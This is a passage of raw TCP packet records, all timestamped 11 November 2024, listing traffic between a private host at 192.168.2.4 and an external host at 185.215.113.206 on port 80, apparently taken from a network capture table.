Nov 11, 2024 01:14:03.033046007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033056021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033061028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033066988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033077002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033092022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033092022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033102036 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033102989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033113003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033119917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033128023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033137083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033145905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033145905 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033157110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033157110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033166885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033166885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033190966 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033191919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033201933 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033210993 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033210993 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033221960 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033231974 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033240080 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033241987 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033252001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033261061 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033267975 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033272982 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033277035 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033282995 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033288002 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033296108 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033305883 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033305883 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033325911 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033327103 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033343077 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033346891 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033353090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033364058 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033373117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033376932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033384085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033389091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033389091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033394098 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033406019 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033410072 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033416033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033423901 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033426046 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033436060 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033440113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033452034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033461094 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033467054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033476114 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033484936 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033495903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033504963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033518076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033528090 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033529043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033539057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033548117 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033552885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033565044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033577919 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033579111 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033588886 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033600092 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033612967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033612967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033639908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033699036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033710003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033734083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033735037 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033745050 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033756971 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033757925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033766985 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033787966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033833027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033843994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033854008 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033864021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033874035 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033884048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033895016 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033900976 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033906937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033917904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033925056 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033930063 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033938885 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033942938 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033956051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033967018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.033970118 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033977985 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.033982038 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034003973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034034014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034040928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034053087 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034063101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034070015 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034074068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034085035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034090042 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034096003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034100056 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034113884 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034123898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034132957 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034137964 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034145117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034147024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034157038 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034168005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034174919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034178972 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034189939 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034199953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034204006 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034210920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034212112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034235001 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034238100 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034250975 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034255981 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034264088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034275055 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034285069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034286022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034296036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034306049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034316063 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034317970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034327030 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034328938 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034341097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034351110 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034357071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034364939 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034368992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034380913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034389973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034389973 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034403086 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034415007 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034415960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034425974 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034437895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034446955 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034449100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034456015 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034460068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034470081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034471035 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034482956 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034492970 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034497976 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034509897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034518003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034523010 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034528017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034535885 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034552097 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034560919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034563065 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034574986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034585953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034586906 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034596920 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034595966 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034609079 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034620047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034622908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034631014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034640074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034648895 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034652948 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034660101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034662962 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034672976 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034684896 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034687996 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034698009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.034719944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034719944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.034755945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.035235882 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.035331011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.065269947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.065294981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.065306902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.065323114 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.065335989 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.065346003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.065362930 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.065376043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.065416098 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.071005106 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.071027994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.071039915 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.071067095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.071084976 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.071091890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.071101904 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.071149111 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104234934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104271889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104285002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104295969 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104295015 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104306936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104310036 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104331970 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104332924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104346991 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104353905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104361057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104372025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104383945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104384899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104394913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.104399920 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104427099 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.104449987 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.143266916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143282890 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143296003 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143343925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.143377066 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.143414021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143424988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143438101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143450022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143450022 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.143461943 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143462896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.143476009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.143477917 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.143512011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182111025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182121992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182132959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182145119 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182157040 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182168961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182179928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182192087 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182223082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182238102 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182240009 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182251930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182265043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182267904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182279110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182291031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182297945 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182301998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182315111 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182324886 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182327986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182342052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182343960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182359934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182370901 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182375908 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182385921 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182398081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182404995 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182410002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182431936 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182446957 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182459116 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182476044 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182487011 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182497978 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182498932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182508945 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182511091 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182519913 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182528973 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182533979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182559967 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182569981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182579994 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182585001 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182595968 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182607889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182610035 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182617903 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182626963 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182629108 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182641983 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182643890 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182651997 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182665110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182677984 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182679892 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182692051 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182703018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182708979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182719946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182729006 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182732105 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182738066 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182743073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182755947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182773113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182775021 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182781935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182792902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182802916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182810068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182812929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182825089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182827950 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182838917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182847977 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182851076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182861090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182871103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182878971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182888985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182898998 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182905912 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182914019 CET	49730	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:03.182919025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182929039 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182940006 CET	80	49730	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:03.182940006 CET	49730	80	192.168.2.4	185.215.113.206
